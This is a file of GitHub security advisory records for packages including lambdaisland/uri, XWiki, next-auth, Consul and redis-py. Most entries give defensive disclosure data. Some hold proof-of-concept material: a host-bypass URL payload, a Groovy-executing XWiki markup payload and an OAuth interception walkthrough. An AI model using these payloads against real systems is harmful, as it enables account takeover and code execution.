[{'package': {'ecosystem': 'crates.io', 'name': 'frontier'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/security/advisories/GHSA-fcmm-54jp-7vf6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28431'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/pull/1017'}, {'type': 'WEB', 'url': 'https://github.com/paritytech/frontier/commit/5af12e94d7dfc8a0208a290643a800f55de7b219'}, {'type': 'PACKAGE', 'url': 'https://github.com/paritytech/frontier'}, {'type': 'WEB', 'url': 'https://github.com/rust-num/num-bigint/blob/6f2b8e0fc218dbd0f49bebb8db2d1a771fe6bafa/src/biguint/power.rs#L134'}]
{'cwe_ids': ['CWE-682'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:31:30Z', 'nvd_published_at': '2023-03-22T21:15:00Z'}
1.4.0
GHSA-cp4w-6x4w-v2h5
2023-03-27T22:31:13Z
2023-03-27T22:31:13Z
null
['CVE-2023-28628']
lambdaisland/uri `authority-regex` returns the wrong authority
### Summary `authority-regex` allows an attacker to send malicious URLs to be parsed by the `lambdaisland/uri` and return the wrong authority. This issue is similar to CVE-2020-8910. ### Details https://github.com/lambdaisland/uri/blob/d3355fcd3e235238f4dcd37be97787a84e580072/src/lambdaisland/uri.cljc#L9 This regex doesn't handle the backslash (`\`) character in the username correctly, leading to a wrong output. **Payload:** `https://example.com\\@google.com` The returned host is `google.com`, but the correct host should be `example.com`. `urllib3` (Python) and `google-closure-library` (Javascript) return `example.com` as the host. Here the correct (or current) regex used by `google-closure-library`: https://github.com/google/closure-library/blob/0e567abedb058e9b194a40cfa3ad4c507653bccf/closure/goog/uri/utils.js#L189 ### PoC ``` (ns poc.core) (require '[lambdaisland.uri :refer (uri)]) (def myurl "https://example.com\\@google.com") (defn -main [] (println myurl) (println (:host (uri myurl))) ) ``` ### Impact The library returns the wrong authority, and it can be abused to bypass host restrictions. ### Reference WHATWG Living URL spec, section 4.4 URL Parsing, host state: https://url.spec.whatwg.org/#url-parsing
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'lambdaisland:uri'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.120'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/security/advisories/GHSA-cp4w-6x4w-v2h5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28628'}, {'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/commit/f46db3e84846f79e14bfee0101d9c7a872321820'}, {'type': 'WEB', 'url': 'https://github.com/google/closure-library/blob/0e567abedb058e9b194a40cfa3ad4c507653bccf/closure/goog/uri/utils.js#L189'}, {'type': 'PACKAGE', 'url': 'https://github.com/lambdaisland/uri'}, {'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/blob/d3355fcd3e235238f4dcd37be97787a84e580072/src/lambdaisland/uri.cljc#L9'}, {'type': 'WEB', 'url': 'https://github.com/lambdaisland/uri/releases/tag/v1.14.120'}]
{'cwe_ids': ['CWE-601', 'CWE-706'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T22:31:13Z', 'nvd_published_at': '2023-03-27T21:15:00Z'}
1.4.0
GHSA-vwr6-qp4q-2wj7
2023-03-03T22:48:57Z
2023-03-03T22:48:57Z
null
['CVE-2023-26472']
XWiki Platform vulnerable to privilege escalation via async macro and IconThemeSheet from the user profile
### Impact One can execute any wiki content with the right of IconThemeSheet author by creating an icon theme with the following content: ``` }}} {{async async="true"}} {{groovy}} println("Hello from Groovy!") {{/groovy}} {{/async}} {{{ ``` Can be done by creating a new page or even through the user profile for users not having edit right. ### Patches This has been patched in XWiki 14.9, 14.4.6, and 13.10.10. ### Workarounds An easy workaround is to actually fix the bug in the page `IconThemesCode.IconThemeSheet` by applying the following modification: https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45 ### References https://jira.xwiki.org/browse/XWIKI-19731 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira](http://jira.xwiki.org) * Email us at [Security ML](mailto:security@xwiki.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2-milestone-1'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-icon-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vwr6-qp4q-2wj7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26472'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/48caf7491595238af2b531026a614221d5d61f38#diff-2ec9d716673ee049937219cdb0a92e520f81da14ea84d144504b97ab2bdae243R45'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19731'}]
{'cwe_ids': ['CWE-116'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:48:57Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
1.4.0
GHSA-wj6x-hcc2-f32j
2023-09-20T17:41:13Z
2023-03-09T18:30:30Z
null
['CVE-2023-0845']
Consul Server Panic when Ingress and API Gateways Configured with Peering Connections
A vulnerability was identified in Consul and Consul Enterprise (“Consul”) an authenticated user with service:write permissions could trigger a workflow that causes Consul server and client agents to crash under certain circumstances. To exploit this vulnerability, an attacker requires access to an ACL token with service:write permissions, and there needs to be at least one running ingress or API gateway that is configured to route traffic to an upstream service.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '1.14.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0845'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-06-consul-server-panic-when-ingress-and-api-gateways-configured-with-peering-connections/51197'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYZOKMMVX4SIEHPJW3SJUQGMO5YZCPHC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XNF4OLYZRQE75EB5TW5N42FSXHBXGWFE/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTE4ITXXPIWZEQ4HYQCB6N6GZIMWXDAI/'}]
{'cwe_ids': ['CWE-476'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T16:04:18Z', 'nvd_published_at': '2023-03-09T16:15:00Z'}
1.4.0
GHSA-ch7v-37xg-75ph
2023-03-14T19:39:51Z
2023-03-03T18:30:27Z
null
['CVE-2022-2835']
coreDNS vulnerable to Improper Restriction of Communication Channel to Intended Endpoints
A flaw was found in coreDNS. This flaw allows a malicious user to reroute internal calls to some internal services that were accessed by the FQDN in a format of <service>.<namespace>.svc.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/coredns/coredns'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.9.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2835'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2118542'}, {'type': 'PACKAGE', 'url': 'https://github.com/coredns/coredns'}]
{'cwe_ids': ['CWE-923'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T23:11:00Z', 'nvd_published_at': '2023-03-03T16:15:00Z'}
1.4.0
GHSA-67g8-c724-8mp3
2023-03-16T21:38:40Z
2023-03-16T17:22:17Z
null
['CVE-2023-28104']
DDOS attack on graphql endpoints
An attacker could use a specially crafted graphql query to execute a Distributed Denial of Service attack (DDOS attack) against a website. This mostly affects websites with publicly exposed and particularly large/complex graphql schemas. If your Silverstripe CMS project does not expose a public facing graphql schema, a user account is required to trigger the DDOS attack. If your site is hosted behind a content delivery network (CDN), such as Imperva or CloudFlare, this will likely further mitigate the risk. Upgrade to `silverstripe/graphql` 4.2.3 or 4.1.2 or above to remedy the vulnerability.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.1'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'silverstripe/graphql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.2'}, {'fixed': '4.2.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/security/advisories/GHSA-67g8-c724-8mp3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28104'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/pull/526'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2023-28104.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/silverstripe/silverstripe-graphql'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases/tag/4.1.2'}, {'type': 'WEB', 'url': 'https://github.com/silverstripe/silverstripe-graphql/releases/tag/4.2.3'}, {'type': 'WEB', 'url': 'https://www.silverstripe.org/download/security-releases/CVE-2023-28104'}]
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T17:22:17Z', 'nvd_published_at': '2023-03-16T16:15:00Z'}
1.4.0
GHSA-66m4-gc8h-hpjx
2023-03-16T21:41:04Z
2023-03-12T06:30:21Z
null
['CVE-2022-48366']
Timing attack in eZ Platform Ibexa
Ibexa DXP is using random execution time to hinder timing attacks against user accounts, a method of discovering whether a given account exists in a system without knowing its password, thus affecting privacy. This implementation was found to not be good enough in some situations. The fix replaces this with constant time functionality, configured in the new security.yml parameter 'ibexa.security.authentication.constant_auth_time'. It will log a warning if the constant time is exceeded. If this happens the setting should be increased.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezplatform-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'ezsystems/ezpublish-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.5.0'}, {'fixed': '7.5.29'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ezsystems/ezplatform-kernel/security/advisories/GHSA-342c-vcff-2ff2'}, {'type': 'WEB', 'url': 'https://github.com/ezsystems/ezpublish-kernel/security/advisories/GHSA-xfqg-p48g-hh94'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-48366'}, {'type': 'WEB', 'url': 'https://developers.ibexa.co/security-advisories/ibexa-sa-2022-006-vulnerabilities-in-page-builder-login-and-commerce'}, {'type': 'PACKAGE', 'url': 'https://github.com/ezsystems/ezplatform-kernel'}]
{'cwe_ids': ['CWE-362'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:55:56Z', 'nvd_published_at': '2023-03-12T05:15:00Z'}
1.4.0
GHSA-24wv-mv5m-xv4h
2023-05-17T18:44:08Z
2023-03-26T21:30:23Z
null
['CVE-2023-28858']
redis-py Race Condition vulnerability
redis-py before 4.5.3, as used in ChatGPT and other products, leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a pipeline operation), and can send response data to the client of an unrelated request in an off-by-one manner. The fixed versions for this CVE Record are 4.3.6, 4.4.3, and 4.5.3, but [are believed to be incomplete](https://github.com/redis/redis-py/issues/2665). CVE-2023-28859 has been assigned the issues caused by the incomplete fixes.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.4.0'}, {'fixed': '4.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.3.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28858'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/issues/2624'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2641'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/commit/d56baeb683fc1935cfa343fa2eeb0fa9bd955283'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-45.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/redis/redis-py'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/compare/v4.3.5...v4.3.6'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/compare/v4.4.2...v4.4.3'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/compare/v4.5.2...v4.5.3'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.4.4'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.5.4'}, {'type': 'WEB', 'url': 'https://openai.com/blog/march-20-chatgpt-outage'}]
{'cwe_ids': ['CWE-193'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T21:31:45Z', 'nvd_published_at': '2023-03-26T19:15:00Z'}
1.4.0
GHSA-qhq8-2f3m-gxvp
2023-03-14T23:03:22Z
2023-03-08T21:30:23Z
null
['CVE-2023-24782']
SQL Injection in Funadmin
Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the id parameter at /databases/database/edit.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'funadmin/funadmin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24782'}, {'type': 'WEB', 'url': 'https://github.com/funadmin/funadmin/issues/3'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-14T23:03:22Z', 'nvd_published_at': '2023-03-08T21:15:00Z'}
1.4.0
GHSA-wp72-7hj9-5265
2023-03-28T18:04:29Z
2023-03-24T22:01:15Z
null
['CVE-2023-1176']
Remote file existence check vulnerability in `mlflow server` and `mlflow ui` CLIs
### Impact Users of the MLflow Open Source Project who are hosting the MLflow Model Registry using the `mlflow server` or `mlflow ui` commands using an MLflow version older than MLflow 2.2.1 may be vulnerable to a remote file existence check exploit if they are not limiting who can query their server (for example, by using a cloud VPC, an IP allowlist for inbound requests, or authentication / authorization middleware). This issue only affects users and integrations that run the `mlflow server` and `mlflow ui` commands. Integrations that do not make use of `mlflow server` or `mlflow ui` are unaffected; for example, the Databricks Managed MLflow product and MLflow on Azure Machine Learning do not make use of these commands and are not impacted by these vulnerabilities in any way. The vulnerability detailed in https://nvd.nist.gov/vuln/detail/CVE-2023-1176 enables an actor to check the existence of arbitrary files unrelated to MLflow from the host server, including any files stored in remote locations to which the host server has access. ### Patches This vulnerability has been patched in MLflow 2.2.1, which was released to PyPI on March 2nd, 2023. If you are using `mlflow server` or `mlflow ui` with the MLflow Model Registry, we recommend upgrading to MLflow 2.2.1 as soon as possible. ### Workarounds If you are using the MLflow open source `mlflow server` or `mlflow ui` commands, we strongly recommend limiting who can access your MLflow Model Registry and MLflow Tracking servers using a cloud VPC, an IP allowlist for inbound requests, authentication / authorization middleware, or another access restriction mechanism of your choosing. If you are using the MLflow open source `mlflow server` or `mlflow ui` commands, we also strongly recommend limiting the remote files to which your MLflow Model Registry and MLflow Tracking servers have access. For example, if your MLflow Model Registry or MLflow Tracking server uses cloud-hosted blob storage for MLflow artifacts, make sure to restrict the scope of your server's cloud credentials such that it can only access files and directories related to MLflow. ### References More information about the vulnerability is available at https://nvd.nist.gov/vuln/detail/CVE-2023-1176.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'mlflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.0'}}]
[{'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/security/advisories/GHSA-wp72-7hj9-5265'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1176'}, {'type': 'WEB', 'url': 'https://github.com/mlflow/mlflow/commit/63ef72aa4334a6473ce7f889573c92fcae0b3c0d'}, {'type': 'PACKAGE', 'url': 'https://github.com/mlflow/mlflow'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ae92f814-6a08-435c-8445-eec0ef4f1085'}]
{'cwe_ids': ['CWE-36'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:15Z', 'nvd_published_at': '2023-03-24T15:15:00Z'}
1.4.0
GHSA-7r7x-4c4q-c4qf
2023-03-13T20:52:50Z
2023-03-13T20:52:50Z
null
['CVE-2023-27490']
Missing proper state, nonce and PKCE checks for OAuth authentication
### Impact `next-auth` applications using OAuth provider versions before `v4.20.1` are affected. A bad actor who can spy on the victim's network or able to social engineer the victim to click a manipulated login link could intercept and tamper with the authorization URL to **log in as the victim**, bypassing the CSRF protection. As an example, an attack can happen in the following scenario. > TL;DR: The attacker steals the victim's authenticated callback by intercepting and tampering with the authorization URL created by `next-auth`. 1. The victim attempts to log in to the `next-auth` site. For example https://next-auth-example.vercel.app/ 2. `next-auth` sets the `checks` cookies according to how the OAuth provider is configured. In this case, `state` and `pkce` are set by default for the Google Provider. <img width="1971" alt="Screen Shot 2023-03-03 at 09 54 26" src="https://user-images.githubusercontent.com/31528554/222619750-a2062bb8-99eb-4985-a75c-d75acd3da67e.png"> 3. The attacker intercepts the returned authorization URL, strips away the OAuth check (nonce, state, pkce), and returns the URL _without_ the check to the victim's browser. For example: From ```https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=client_id&scope=openid%20email%20profile&response_type=code&redirect_uri=https%3A%2F%2Fnext-auth-example.vercel.app%2Fapi%2Fauth%2Fcallback%2Fgoogle&state=state&code_challenge=code_challenge&code_challenge_method=S256&service=lso&o2v=2&flowName=GeneralOAuthFlow``` to ```https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=client_id&scope=openid%20email%20profile&response_type=code&redirect_uri=https%3A%2F%2Fnext-auth-example.vercel.app%2Fapi%2Fauth%2Fcallback%2Fgoogle&service=lso&o2v=2&flowName=GeneralOAuthFlow```. Notice the parameters `state`, `code_challenge` and `code_verifier` are removed from the victim's address bar. 4. The victim attempts to log in using their OAuth account. 5. The Authorization Server logs the victim in and calls back to the `next-auth` `api/auth/callback/:providerId`endpoint. 5.1. The attacker intercepts and logs this callback URL for later use. 5.2. `next-auth` checks the callback call from OAuth Authorization Server (doesn't have checks) and compares the checks with the cookies set (has checks) at step 2. This check will fail, resulting in the victim isn't logged in. However, at this step, the Authorization Server has already accepted the victim's request to log in and generated/sent a `code` in the URL. 6. The attacker now has an authorization URL with the `code` that the AS will exchange for valid `access_token`/`id_token` and can log in as the victim automatically. They can open a new browser window and paste in the URL logged at step 5.1 and log in as the victim. ### Patches We patched the vulnerability in `next-auth` `v4.20.1` To upgrade, run one of the following: ``` npm i next-auth@latest ``` ``` yarn add next-auth@latest ``` ``` pnpm add next-auth@latest ``` ### Workarounds Upgrading to `latest` is the recommended way to fix this issue. However, using [Advanced Initialization](https://next-auth.js.org/configuration/initialization#advanced-initialization), developers can manually check the [callback request](https://next-auth.js.org/getting-started/rest-api#getpost-apiauthcallbackprovider) for `state`, `pkce`, and `nonce` against the provider configuration, and abort the sign-in process if there is a mismatch. Check out the [source code](https://github.com/nextauthjs/next-auth/blob/v4/packages/next-auth/src/core/lib/oauth/checks.ts) for help. ### References - [CSRF](https://www.rfc-editor.org/rfc/rfc6749#section-10.12) - [PKCE vs nonce](https://danielfett.de/2020/05/16/pkce-vs-nonce-equivalent-or-not/) - [OAuth provider options](https://next-auth.js.org/configuration/providers/oauth) - [`checks` provider config](https://authjs.dev/reference/core/providers#checks)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'next-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.20.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/nextauthjs/next-auth/security/advisories/GHSA-7r7x-4c4q-c4qf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27490'}, {'type': 'WEB', 'url': 'https://authjs.dev/reference/core/providers#checks'}, {'type': 'WEB', 'url': 'https://danielfett.de/2020/05/16/pkce-vs-nonce-equivalent-or-not/'}, {'type': 'PACKAGE', 'url': 'https://github.com/nextauthjs/next-auth'}, {'type': 'WEB', 'url': 'https://github.com/nextauthjs/next-auth/compare/next-auth@4.20.0...next-auth@4.20.1#diff-cf9257195d0cb6a835ae4ff1fc73fe2cac0bab847efb0832c1f551209a972b47R55'}, {'type': 'WEB', 'url': 'https://next-auth.js.org/configuration/initialization#advanced-initialization'}, {'type': 'WEB', 'url': 'https://next-auth.js.org/configuration/providers/oauth'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230420-0006/'}, {'type': 'WEB', 'url': 'https://www.rfc-editor.org/rfc/rfc6749#section-10.12'}]
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-13T20:52:50Z', 'nvd_published_at': '2023-03-09T21:15:00Z'}
1.4.0
GHSA-6722-xvq8-3254
2023-03-13T15:29:04Z
2023-03-06T06:30:18Z
null
['CVE-2023-26107']
SketchSVG Arbitrary Code Injection vulnerability
All versions of the package sketchsvg are vulnerable to Arbitrary Code Injection when invoking `shell.exec` without sanitization nor parametrization while concatenating the current directory as part of the command string.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'sketchsvg'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26107'}, {'type': 'PACKAGE', 'url': 'https://github.com/eBay/SketchSVG'}, {'type': 'WEB', 'url': 'https://github.com/eBay/SketchSVG/blob/dd1036648f0f320a3187ef79d506b676b9eb87a6/lib/index.js#23L115'}, {'type': 'WEB', 'url': 'https://github.com/eBay/SketchSVG/blob/dd1036648f0f320a3187ef79d506b676b9eb87a6/lib/index.js#23L64'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SKETCHSVG-3167969'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-07T20:30:33Z', 'nvd_published_at': '2023-03-06T05:15:00Z'}
1.4.0
GHSA-j72f-4hgp-3mwc
2023-03-23T19:48:32Z
2023-03-17T09:30:19Z
null
['CVE-2023-1454']
jeecg-boot SQL Injection vulnerability
A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-223299.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-common'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1454'}, {'type': 'WEB', 'url': 'https://github.com/J0hnWalker/jeecg-boot-sqli'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.223299'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.223299'}]
{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:48:32Z', 'nvd_published_at': '2023-03-17T07:15:00Z'}
1.4.0
GHSA-92wp-r7hm-42g7
2023-03-03T22:50:41Z
2023-03-03T22:50:41Z
null
['CVE-2023-26470']
XWiki Platform subject to Uncontrolled Resource Consumption
### Impact It's possible to make the farm unusable by adding an object to a page with a huge number (e.g. 67108863). This will most of the time fill the memory allocated to XWiki and make it unusable every time this document is manipulated. ### Patches It has been patched in XWiki 14.0 ### Workarounds There is no workaround. ### References https://jira.xwiki.org/browse/XWIKI-19223 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](https://jira.xwiki.org) * Email us at [our security mailing list](mailto:security@xwiki.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '14.0-rc-1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-92wp-r7hm-42g7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26470'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/04e5a89d2879b160cdfaea846024d3d9c1a525e6'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/db3d1c62fc5fb59fefcda3b86065d2d362f55164'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/fdfce062642b0ac062da5cda033d25482f4600fa'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-19223'}]
{'cwe_ids': ['CWE-400', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:50:41Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
1.4.0
GHSA-w7qg-j435-78qw
2023-04-06T22:53:10Z
2023-03-30T12:30:15Z
null
['CVE-2023-1712']
Use of hard-coded, security-relevant constants in deepset-ai/haystack
Use of Hard-coded, Security-relevant Constants in GitHub repository deepset-ai/haystack in version 1.15.0 and prior. A patch is available at commit 5fc84904f198de661d5b933fde756aa922bf09f1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'farm-haystack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.15.0'}]}]}]
